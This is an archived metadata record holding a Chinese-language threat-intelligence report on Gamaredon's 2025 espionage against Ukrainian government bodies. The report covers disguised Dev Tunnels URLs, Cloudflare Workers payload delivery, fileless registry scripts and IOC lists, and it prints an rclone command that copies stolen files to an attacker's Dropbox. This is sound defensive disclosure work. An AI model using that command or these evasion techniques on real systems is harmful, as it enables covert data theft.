{ "id": "7eb031ae-8100-41a3-9280-bdf394707e2e", "created_at": "2026-04-06T00:14:04.681296Z", "updated_at": "2026-04-10T13:12:03.76262Z", "deleted_at": null, "sha1_hash": "db25d80ed77ab8630cfd21e591bd9a4aef8db36c", "title": "APT-C-53(Gamaredon)针对乌克兰政府职能部门攻击事件分析", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 462646, "plain_text": "APT-C-53(Gamaredon)针对乌克兰政府职能部门攻击事件分析\r\nBy admin 169193文章 130评论\r\nArchived: 2026-04-05 16:03:37 UTC\r\nAPT-C-53\r\nGamaredon\r\nAPT-C-53(Gamaredon),又名Primitive Bear、Winterflounder、BlueAlpha,是一个自2013年起活跃的俄\r\n罗斯政府支持的高级持续威胁(APT)组织。该组织长期针对乌克兰政府、军事等重点单位进行攻击,最\r\n早攻击活动可追溯至2013年,主要目的为窃取情报、进行间谍活动等。该组织十分活跃,即使近几年不\r\n断被安全厂商披露其攻击活动,但也未曾阻止APT-C-53停止行动潜伏,反而有越演越烈的趋势。\r\n360高级威胁研究院近期监测数据显示,Gamaredon组织已升级其攻击技术链,核心演进体现为C2基础设\r\n施的动态云化迁移与云存储工具定向投递。该组织在2025年持续针对乌克兰政府职能部门开展高密度情\r\n报窃取活动,本报告据此展开专项分析,建议相关机构及人员强化安全防护意识,加强涉密情报与用户\r\n数据的加密保护及访问控制,有效防范恶意攻击导致的信息泄露风险。\r\n一、基础设施动态变更\r\n原存储于Telegram Telegraph平台的历史恶意链接[1](https://telegra[.]ph/Vizit-12-28)于2025年6月26日监测\r\n时发生多次快速变更,新地址滥用微软开发者隧道服务(Dev Tunnels)构建攻击链。\r\n1.时间线演进\r\n时间:2025-03-27\r\n初始C2:https[:]//nandayo.ru/srgssdfsf\r\n解析IP:194.67.71.128 (RU-AS48347)/31.129.22.156 (UA-AS15895)\r\n时间:2025-06-26 T0\r\n首次发现变更:https[:]//wise.com@p9tm15n7-80.euw.devtunnels.ms/fumes\r\nhttps://cn-sec.com/archives/4411359.html\r\nPage 1 of 5\n\n时间:2025-06-26 T0+2小时\r\n二次发现变更:https[:]//megamarket.ua@p9tm15n7-80.euw.devtunnels.ms/babism\r\nAPT-C-53(Gamaredon)针对乌克兰政府职能部门攻击事件分析\r\n2.战术技术解析\r\n该组织此轮攻击采用白域名伪装(White-listed Domain Camouflage) 技术构建恶意URL。该手法利用合法\r\n的user:password@host语法结构,将高信誉商业域名(如wise.com与megamarket.ua)嵌入用户名字段。这\r\n种结构化欺骗诱导安全设备仅验证@符号前的域名信誉,而实际网络连接指向@后的恶意主机\r\n*.devtunnels.ms。通过滥用安全系统对可信域名的宽松检测策略,攻击者成功掩盖了真实攻击基础设施,\r\n此技术属于该组织惯用的域名混淆(Domain Shadowing)战术演进形态。\r\nCTF 竞赛\r\n攻击链核心依赖于云隧道服务武器化(Dev Tunnels Abuse) 实现高级隐匿。攻击者通过微软开发者隧道\r\n服务生成临时子域名*-80.euw.devtunnels.ms,并自动获取微软权威证书颁发机构签发的有效TLS证书。恶\r\n意通信流量被嵌套在HTTPS加密隧道中,与海量合法开发流量混合传输,大幅降低基于流量行为分析的\r\n检出率。\r\n该技术带来双重对抗优势:其一,原始C2服务器IP被微软中继节点完全屏蔽,阻断基于IP信誉的威胁情\r\n报溯源;其二,利用服务提供的分钟级域名重置能力,攻击者可快速轮换基础设施节点,依托主流云服\r\n务的可信资质和流量规模,实现近乎零暴露面的持续威胁操作。\r\n 二、数据窃取 \r\n监测发现攻击者通过多层恶意脚本构建自动化数据外泄通道,其攻击链始于注册表持久化机制。攻击者\r\n在HKCU:System路径下创建恶意键值存储加密脚本,利用PowerShell动态编译执行有效规避静态代码检\r\n测。\r\nhttps://cn-sec.com/archives/4411359.html\r\nPage 2 of 5\n\n在载荷投递阶段,攻击链采用双路径分发策略,通过Cloudflare Workers构建动态攻击面:\r\n第一阶段:攻击者采用高频轮换的Cloudflare Workers子域名构建分布式载荷投递网络,其域名变更呈现明\r\n显战术特征:\r\n① 域名池动态扩展:\r\n攻击周期内累计使用至少8个子域名,包括*.3150wild.workers.dev、*.bronzevere.workers.dev等,形成可快\r\n速切换的分发节点矩阵。\r\n② 域名生成策略:\r\n伪随机前缀模式:bdslmtlqh/jqrwbrbj(长度8-10字符)\r\n语义组合模式:embarrassed3627+previoussusanna(社会工程学诱导信任)\r\n生存周期压缩:每个子域名平均活跃时间≤48小时,缩短域名存活期,显著提升追踪难度。\r\n第二阶段:攻击者通过Cloudflare Workers节点(https[:]//xuwj.goldjan.workers.dev/index.php?id=ef32b0a7-\r\n0830-498b-8113-7b796bab5b8a)分发恶意VBScript脚本。该接口使用GUID参数实现动态载荷绑定,有效\r\n规避基于URL静态特征的检测。成功下载后,将脚本写入%TEMP%系统临时目录,其文件名采用tmp[0-\r\n9A-Z]{4}.tmp.vbs格式生成(例如tmp7F3A.tmp.vbs),随机化命名策略可有效干扰文件哈希匹配检测。\r\n最后通过wscript.exe加载执行该VBScript文件,该VBS脚本功能与前期样本功能大致相同,故不再单独分\r\n析。\r\n值得关注的是,部分功能通过将数据存储在注册表键HKCU:System*[此例为waistline217]中并动态编译执\r\n行,实现无文件攻击,并将获取数据暂存于伪装目录%localappdata%Winwordini.DAT,该路径模拟Office\r\n临时文件降低可疑性,读取后立即删除ini.DAT,通过注册表配置的外泄通道输出数据。\r\nAPT-C-53(Gamaredon)针对乌克兰政府职能部门攻击事件分析\r\n最终数据外泄阶段表现为对合法云工具的武器化。\r\n部署签名的rclone.exe执行同步命令:\r\npowershell rclone.exe copy %UserProfile%AppDataLocalTemp1750756392913 dropbox:DP27-KA-000422_585516477/\r\n通过Dropbox存储桶[用户标识:DP27-KA-000422_585516477]实现加密传输,利用商业云服务的可信性绕\r\n过流量审计。\r\n该攻击链体现高度专业化设计,通过四层隐匿措施(注册表驻留、动态编译、路径伪装、云服务滥用)\r\n实现从初始植入到数据外泄的全流程隐蔽操作,其技术组合显著提升了传统安全解决方案的检测难度。\r\nCTF 竞赛\r\n 三、归属研判 \r\nhttps://cn-sec.com/archives/4411359.html\r\nPage 3 of 5\n\n综合战术连续性(telegra.ph/VBS/注册表攻击链)、基础设施复用(devtunnels.ms+历史C2链接)、及.ru\r\n域名地缘关联,可高度置信判定为Gamaredon组织攻击活动。其攻击意图持续聚焦乌克兰关键领域,技术\r\n演进呈现\"云化、合法化、自动化\"特征。360高级威胁研究院持续跟踪APT-C-53(Gamaredon)的相关攻\r\n击活动,上述分析仅展示了Gamaredon攻击活动的一部分,其相关攻击手段在以往的攻击行动中已有所展\r\n现。根据我们评估,Gamaredon仍然会持续针对乌克兰进行网络攻击,旨在获取敏感信息并破坏关键基础\r\n设施。我们的持续监测和分析将有助于识别其新的攻击策略和手段,从而为防御提供更有效的支持。\r\n 四、防范排查建议 \r\n强化邮件安全防护:部署先进的邮件网关解决方案,过滤和拦截恶意附件和钓鱼邮件,特别是含有\r\nLNK文件和恶意压缩文件的邮件。\r\n加强系统和网络监控:实施全面的日志监控和分析,重点关注系统启动项、注册表修改以及\r\nPowerShell脚本的执行记录。\r\n强化终端安全防护:安装360安全卫士,并确保所有终端设备安装并定期更新反病毒和反恶意  软\r\n件,进行全面的恶意软件扫描。\r\n附录 IOC\r\nC2:\r\nlitanq[.]ru\r\nfulagam[.]ru\r\nbulam[.]ru\r\neuw.devtunnels[.]ms\r\ndvofiuao.3150wild.workers[.]dev\r\ntskqbu.bronzevere.workers[.]dev\r\nbdslmtlqh.bronzevere.workers[.]dev\r\njqrwbrbj.bronzevere.workers[.]dev\r\nkhycpsgbu.previoussusanna.workers[.]dev\r\noexvrm.embarrassed3627.workers[.]dev\r\nxuwj.goldjan.workers[.]dev\r\ngohiz.griercrimson.workers[.]dev\r\nMD5:\r\nhttps://cn-sec.com/archives/4411359.html\r\nPage 4 of 5\n\n98b540aeb2e2350f74ad36ddb4d3f66f\r\n0459531e3cbc84ede6a1a75846a87495\r\nf3deebe705478ec1a4ec5538ac3669cb\r\n67896b57a4dcf614fb22283c130ab78b\r\nd2c551812c751332b74b0517e76909f2\r\n9258a427c782cd8d7dcf25dc0d661239\r\n023429e53d32fa29e4c7060c8f3d37db\r\n参考\r\n[1] https://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/\r\n团队介绍\r\nTEAM INTRODUCTION\r\n360高级威胁研究院\r\n360高级威胁研究院是360数字安全集团的核心能力支持部门,由360资深安全专家组成,专注于高级威胁\r\n的发现、防御、处置和研究,曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在\r\n野攻击,独家披露多个国家级APT组织的高级行动,赢得业内外的广泛认可,为360保障国家网络安全提\r\n供有力支撑。\r\n原文始发于微信公众号(360威胁情报中心):APT-C-53(Gamaredon)针对乌克兰政府职能部\r\n门攻击事件分析\r\n免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用\r\n途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用\r\n企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。\r\n点赞\r\nhttps://cn-sec.com/archives/4411359.html 复制链接 复制链接\r\nSource: https://cn-sec.com/archives/4411359.html\r\nhttps://cn-sec.com/archives/4411359.html\r\nPage 5 of 5", "extraction_quality": 1, "language": "ZH", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://cn-sec.com/archives/4411359.html" ], "report_names": [ "4411359.html" ], "threat_actors": [ { "id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308", "created_at": "2022-10-25T15:50:23.320841Z", "updated_at": "2026-04-10T02:00:05.356444Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Gamaredon Group", "IRON TILDEN", "Primitive Bear", "ACTINIUM", "Armageddon", "Shuckworm", "DEV-0157", "Aqua Blizzard" ], "source_name": "MITRE:Gamaredon Group", "tools": [ "QuietSieve", "Pteranodon", "Remcos", "PowerPunch" ], "source_id": "MITRE", "reports": null }, { "id": "d5156b55-5d7d-4fb2-836f-861d2e868147", "created_at": "2023-01-06T13:46:38.557326Z", "updated_at": "2026-04-10T02:00:03.023048Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "ACTINIUM", "DEV-0157", "Blue Otso", "G0047", "IRON TILDEN", "PRIMITIVE BEAR", "Shuckworm", "UAC-0010", "BlueAlpha", "Trident Ursa", "Winterflounder", "Aqua Blizzard", "Actinium" ], "source_name": "MISPGALAXY:Gamaredon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "61940e18-8f90-4ecc-bc06-416c54bc60f9", "created_at": "2022-10-25T16:07:23.659529Z", "updated_at": "2026-04-10T02:00:04.703976Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Actinium", "Aqua Blizzard", "Armageddon", "Blue Otso", "BlueAlpha", "Callisto", "DEV-0157", "G0047", "Iron Tilden", "Operation STEADY#URSA", "Primitive Bear", "SectorC08", "Shuckworm", "Trident Ursa", "UAC-0010", "UNC530", "Winterflounder" ], "source_name": "ETDA:Gamaredon Group", "tools": [ "Aversome infector", "BoneSpy", "DessertDown", "DilongTrash", "DinoTrain", "EvilGnome", "FRAUDROP", "Gamaredon", "GammaDrop", "GammaLoad", "GammaSteel", "Gussdoor", "ObfuBerry", "ObfuMerry", "PlainGnome", "PowerPunch", "Pteranodon", "Pterodo", "QuietSieve", "Remcos", "RemcosRAT", "Remote Manipulator System", "Remvio", "Resetter", "RuRAT", "SUBTLE-PAWS", "Socmer", "UltraVNC" ], "source_id": "ETDA", "reports": null }, { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434444, "ts_updated_at": 1775826723, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/db25d80ed77ab8630cfd21e591bd9a4aef8db36c.pdf", "text": "https://archive.orkl.eu/db25d80ed77ab8630cfd21e591bd9a4aef8db36c.txt", "img": "https://archive.orkl.eu/db25d80ed77ab8630cfd21e591bd9a4aef8db36c.jpg" } }